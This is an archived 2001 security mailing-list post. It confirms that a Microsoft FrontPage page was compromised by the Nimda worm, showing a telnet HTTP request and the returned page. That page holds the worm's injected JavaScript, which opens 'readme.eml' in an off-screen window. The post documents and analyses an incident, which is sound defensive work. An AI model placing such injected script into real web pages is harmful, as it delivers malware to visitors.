-----BEGIN PGP SIGNED MESSAGE----- On Wed, 19 Sep 2001, Steve Cody wrote: > I just went to http://www.microsoft.com/frontpage, and my Symantec > Norton Antivirus popped up and denied access to readme.eml. > > I could not view the source of the loaded page, so I can't verify that > it is definitely infected. Your worst fears have now been confirmed. sasumata$ telnet www.microsoft.com 80 Trying 207.46.197.100... Connected to www.microsoft.akadns.net. Escape character is '^]'. GET /frontpage/ HTTP/1.0 <snip> <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> Microsoft's site has been compromised by Nimda. There is no disputing it now. - -Jay ( ( _______ )) )) .--"There's always time for a good cup of coffee"--. >====<--. C|~~|C|~~| (>------ Jay D. Dyson -- jdysonat_private ------<) | = |-' `--' `--' `-- What doesn't kill us only makes us stronger. --' `------' -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: See http://www.treachery.net/~jdyson/ for current keys. iQCVAwUBO6kH9rlDRyqRQ2a9AQESugP8C6RIIUmkcV/e6ifRNqz067ER5PSizDDA APzdpR1DO1Q9N5lMEtUagEshgDSYiGKUBU+5vesKZ7TWCjad4iuY8ME0oe4yZxjv acSX3Tqo0b+sQtJ5VF1IYSljqSbZ+EvYYDUUF8PEmQdkyCp2u/J8HX+duykaisvc 5CjLcnLK5U8= =DIF4 -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 15:12:17 PDT